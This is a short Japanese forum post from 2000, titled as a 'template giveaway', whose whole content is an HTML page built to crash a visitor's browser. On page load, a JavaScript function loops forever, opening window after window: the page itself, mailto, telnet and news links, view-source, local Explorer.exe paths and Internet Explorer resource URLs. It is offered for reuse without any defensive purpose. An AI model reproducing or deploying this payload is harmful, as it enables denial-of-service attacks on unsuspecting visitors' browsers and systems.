テンプレ放出 投稿者:舞茸秋子 2000/04/12 (水) 20:47:37 ▼ ◇ [mirai]<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=x-sjis">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>crash</title>
</head>
<body onload="crash();">
<script language="JavaScript">
function crash()
{
while(1)
{
window.open("open2.html")
window.open("mailto:crash")
window.open("telnet:crash")
window.open("news:crash")
window.open("view-source:http://crash.html")
window.open("file:///A:/WINDOWS/Explorer.exe")
window.open("file:///C:/WINDOWS/Explorer.exe")
window.open("res://ie4tour.dll/tour.htm")
window.open("res://ie4tour.dll/welcome.htm")
}
}
</script>
</body>
</html>